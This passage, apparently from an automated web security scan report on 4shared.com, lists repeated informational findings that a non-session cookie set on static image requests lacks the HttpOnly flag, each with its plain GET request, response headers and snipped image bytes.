Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:34 GMT; Path=/
Set-Cookie: hostid=172001427; Expires=Mon, 26-Jul-2021 13:59:34 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:34 GMT
ETag: W/"253-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/png
Content-Length: 253
Date: Fri, 29 Jul 2011 13:59:34 GMT

.PNG
.
...IHDR.......".......C#....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE......................z...Z............. ....
........!..............$........".......}..~........6IDATx........ ......
...[SNIP]...

6.38. http://www.4shared.com/images/blueBanner_plus.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/blueBanner_plus.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-2039896466; Expires=Mon, 26-Jul-2021 14:07:19 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/blueBanner_plus.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:19 GMT; Path=/
Set-Cookie: hostid=-2039896466; Expires=Mon, 26-Jul-2021 14:07:19 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:19 GMT
ETag: W/"1046-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1046
Date: Fri, 29 Jul 2011 14:07:18 GMT

GIF89a..........k.'h.+d.,|..~.....v..u..m.&z..........^.-c.+..s..b.....`.8z..j.&{..n..{..p.'q.$...Z.'......g.#......}. ..Iz...........x..n.&}..........e....O........K.....?..vt.....................
...[SNIP]...

6.39. http://www.4shared.com/images/bookmarks/newstyle/facebook.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/bookmarks/newstyle/facebook.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-795695071; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bookmarks/newstyle/facebook.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:26 GMT; Path=/
Set-Cookie: hostid=-795695071; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:26 GMT
ETag: W/"554-1301314722000"
Last-Modified: Mon, 28 Mar 2011 12:18:42 GMT
Content-Type: image/png
Content-Length: 554
Date: Fri, 29 Jul 2011 14:00:25 GMT

.PNG
.
...IHDR................a... pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx...M/.A...]....^.4..88x.D88x...U".\.7p.-Hp.8.....W..X+.JC.[......T...\...<...gvG..[.... 5....._..-.L
...[SNIP]...

6.40. http://www.4shared.com/images/bookmarks/newstyle/orkut.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/bookmarks/newstyle/orkut.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=552594880; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bookmarks/newstyle/orkut.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:28 GMT; Path=/
Set-Cookie: hostid=552594880; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:28 GMT
ETag: W/"794-1301314722000"
Last-Modified: Mon, 28 Mar 2011 12:18:42 GMT
Content-Type: image/png
Content-Length: 794
Date: Fri, 29 Jul 2011 14:00:28 GMT

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...ML.A......w.l.j.t.........HL....'..s..W...G=...M.D.$.D..`....P.(-...n.mwv.].Q....L.......{.../{[#.d...r0..Y....|>....
...[SNIP]...

6.41. http://www.4shared.com/images/bookmarks/newstyle/orkutshare.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/bookmarks/newstyle/orkutshare.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1715885997; Expires=Mon, 26-Jul-2021 14:00:06 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bookmarks/newstyle/orkutshare.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:06 GMT; Path=/
Set-Cookie: hostid=-1715885997; Expires=Mon, 26-Jul-2021 14:00:06 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:06 GMT
ETag: W/"1290-1305634976000"
Last-Modified: Tue, 17 May 2011 12:22:56 GMT
Content-Type: image/png
Content-Length: 1290
Date: Fri, 29 Jul 2011 14:00:05 GMT

.PNG
.
...IHDR...L.........'J......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..X]L#U..f.G................
.qA..`..(......f....!.D...$.......b`.`7....*eY.mK.....e...-.....df.=.....9.L9...d......".)
...[SNIP]...

6.42. http://www.4shared.com/images/bookmarks/newstyle/twitter.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/bookmarks/newstyle/twitter.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-380473347; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bookmarks/newstyle/twitter.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:26 GMT; Path=/
Set-Cookie: hostid=-380473347; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:26 GMT
ETag: W/"592-1301314722000"
Last-Modified: Mon, 28 Mar 2011 12:18:42 GMT
Content-Type: image/png
Content-Length: 592
Date: Fri, 29 Jul 2011 14:00:25 GMT

.PNG
.
...IHDR................a... pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx..S.n.A.=3;^{c;..)B.-.U
..(.#7....'PR..A......A.@..T...I.(...cfv.;....D.......=...x....r..w....[....
...[SNIP]...

6.43. http://www.4shared.com/images/brdlefts.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/brdlefts.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1505474669; Expires=Mon, 26-Jul-2021 14:08:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/brdlefts.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:01 GMT; Path=/
Set-Cookie: hostid=-1505474669; Expires=Mon, 26-Jul-2021 14:08:01 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:01 GMT
ETag: W/"51-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 51
Date: Fri, 29 Jul 2011 14:08:00 GMT

GIF89a ............~....!.......,.... ......D.)..;

6.44. http://www.4shared.com/images/brdrights.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/brdrights.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=430664651; Expires=Mon, 26-Jul-2021 14:08:18 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/brdrights.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:18 GMT; Path=/
Set-Cookie: hostid=430664651; Expires=Mon, 26-Jul-2021 14:08:18 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:18 GMT
ETag: W/"51-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 51
Date: Fri, 29 Jul 2011 14:08:18 GMT

GIF89a ............~....!.......,.... ......./...;

6.45. http://www.4shared.com/images/butGetStarted.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/butGetStarted.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-11666394; Expires=Mon, 26-Jul-2021 14:07:56 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/butGetStarted.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:56 GMT; Path=/
Set-Cookie: hostid=-11666394; Expires=Mon, 26-Jul-2021 14:07:56 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:56 GMT
ETag: W/"3376-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 3376
Date: Fri, 29 Jul 2011 14:07:55 GMT

GIF89a.....V...................nv..........T].Yb.-9l..........#[......MW.rz......................=Hw.........IT.{..GQ...... -cfn.0<n`h.ir.|{..)`.........}..OY.$1f.....................................
...[SNIP]...

6.46. http://www.4shared.com/images/butGo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/butGo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-2013721944; Expires=Mon, 26-Jul-2021 14:07:57 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/butGo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:57 GMT; Path=/
Set-Cookie: hostid=-2013721944; Expires=Mon, 26-Jul-2021 14:07:57 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:57 GMT
ETag: W/"724-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 724
Date: Fri, 29 Jul 2011 14:07:56 GMT

GIF89a2................................................................................................................................................................................................
...[SNIP]...

6.47. http://www.4shared.com/images/butJoinNow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/butJoinNow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=897061432; Expires=Mon, 26-Jul-2021 14:08:05 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/butJoinNow.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:05 GMT; Path=/
Set-Cookie: hostid=897061432; Expires=Mon, 26-Jul-2021 14:08:05 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:05 GMT
ETag: W/"1366-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1366
Date: Fri, 29 Jul 2011 14:08:05 GMT

GIF89av......gf~. Y..........................................................................................Xa..:m......mt.hp.bj..,b...y....\e....dl. -c!.dGQ~...fn.......S\.U^..........:Ev......MW.n
...[SNIP]...

6.48. http://www.4shared.com/images/butLogin.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/butLogin.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1765539105; Expires=Mon, 26-Jul-2021 14:07:54 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/butLogin.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:54 GMT; Path=/
Set-Cookie: hostid=1765539105; Expires=Mon, 26-Jul-2021 14:07:54 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:54 GMT
ETag: W/"1352-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1352
Date: Fri, 29 Jul 2011 14:07:54 GMT

GIF89aD................................................................................................................................................................................................
...[SNIP]...

6.49. http://www.4shared.com/images/cornerBL.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/cornerBL.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1300466186; Expires=Mon, 26-Jul-2021 14:09:56 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cornerBL.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:56 GMT; Path=/
Set-Cookie: hostid=1300466186; Expires=Mon, 26-Jul-2021 14:09:56 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:56 GMT
ETag: W/"660-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 660
Date: Fri, 29 Jul 2011 14:09:56 GMT

GIF89a.....R.~.|}.PQU{|~^_axy||}hikyz}z{~rsu[\^mnpwx{deguvy{|qruvwytuxijmnor......\]_efilmostvOPS`acoprmnq...bceUVYQRU]^`hil~~....ghjstwTUW......TUX......_`c........z{}......lmp...fgjyy|...Z[]...t
...[SNIP]...

6.50. http://www.4shared.com/images/cornerBL2.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/cornerBL2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=861766072; Expires=Mon, 26-Jul-2021 14:07:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cornerBL2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:59 GMT; Path=/
Set-Cookie: hostid=861766072; Expires=Mon, 26-Jul-2021 14:07:59 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:59 GMT
ETag: W/"551-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 551
Date: Fri, 29 Jul 2011 14:07:59 GMT

GIF89a.......~.NOS............}~.~.|}|}.{|z{}abdnorfgivwyxy{yz}bceklnstwRSVpqtwxzuvyhil...mnqpqs..........................._`c............tuxmnp.....PQU..._`b...ops...XY\.........lmp......}~....V
...[SNIP]...

6.51. http://www.4shared.com/images/cornerBR.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/cornerBR.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1202501898; Expires=Mon, 26-Jul-2021 14:09:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cornerBR.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:53 GMT; Path=/
Set-Cookie: hostid=-1202501898; Expires=Mon, 26-Jul-2021 14:09:53 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:53 GMT
ETag: W/"662-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 662
Date: Fri, 29 Jul 2011 14:09:53 GMT

GIF89a.....Q.~.|}.PQUqru^_axy|hik{|~yz}z{~[\^|}rsuwx{tuxdeg{|uvyvwymnpbce]^`norefihilstvz{}...QRUlmo`acOPSmnqfgjijm~~.UVYoprghj\]_...Z[]...lmpvwz......stw........................TUX...............t
...[SNIP]...

6.52. http://www.4shared.com/images/cornerBR2.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/cornerBR2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=896634218; Expires=Mon, 26-Jul-2021 14:08:00 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cornerBR2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:00 GMT; Path=/
Set-Cookie: hostid=896634218; Expires=Mon, 26-Jul-2021 14:08:00 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:00 GMT
ETag: W/"567-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 567
Date: Fri, 29 Jul 2011 14:07:59 GMT

GIF89a.......~.NOS............}~.~.|}|}.z{}abd{|pqtRSV...vwyyz}hiluvystw...pqs^_aklnfgiwxzmnq........................mnp...xy{bce......wx{......qru.....lmp......opstuwWXZvwz...}~.XY\jkm...PQUQRUy
...[SNIP]...

6.53. http://www.4shared.com/images/cornerTL.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/cornerTL.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1473538100; Expires=Mon, 26-Jul-2021 14:09:51 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cornerTL.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:51 GMT; Path=/
Set-Cookie: hostid=-1473538100; Expires=Mon, 26-Jul-2021 14:09:51 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:51 GMT
ETag: W/"407-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 407
Date: Fri, 29 Jul 2011 14:09:51 GMT

GIF89a.....0.~.|}stwyz|{|~fgj|}.wxz}~.rsvijmvwzbce^_almolmpuvx}~.oprrsughk\]_qru...stv......WX\............{|xy{...tuwpqsfgiqrtZ[]~.vwy......z{}z{~NOS~............................................
...[SNIP]...

6.54. http://www.4shared.com/images/cornerTL3.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/cornerTL3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-255945651; Expires=Mon, 26-Jul-2021 14:07:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cornerTL3.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:53 GMT; Path=/
Set-Cookie: hostid=-255945651; Expires=Mon, 26-Jul-2021 14:07:53 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:53 GMT
ETag: W/"644-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 644
Date: Fri, 29 Jul 2011 14:07:53 GMT

GIF89a..........~.|}{|~|}.wxzstwfgjyz|}~....oprbcelmpijm^_almoqru\]_vwzrsv}~.uvxrsughk..................!

............{|........................gXS...:,,...xy{.........WX\tuwstvI91<..pqsfgiqrtZ[]~
...[SNIP]...

6.55. http://www.4shared.com/images/cornerTL6.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/cornerTL6.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1302497509; Expires=Mon, 26-Jul-2021 14:08:02 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cornerTL6.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:02 GMT; Path=/
Set-Cookie: hostid=1302497509; Expires=Mon, 26-Jul-2021 14:08:02 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:02 GMT
ETag: W/"697-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 697
Date: Fri, 29 Jul 2011 14:08:01 GMT

GIF89a.......~.NOSz{~z{}......vwyZ[]~.qrtfgipqsX_cY_`U\`Y_c~.X]a|}W]a{|~stwW__X`]yz|X]_wxz|}.fgjY`d}~.Y`eX``ey....h|................cw}lmpqrudxrsu...}~.ijmbce\]_rsv]lo......ghkX\copruvx^_avwzlmoX
...[SNIP]...

6.56. http://www.4shared.com/images/cornerTR.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
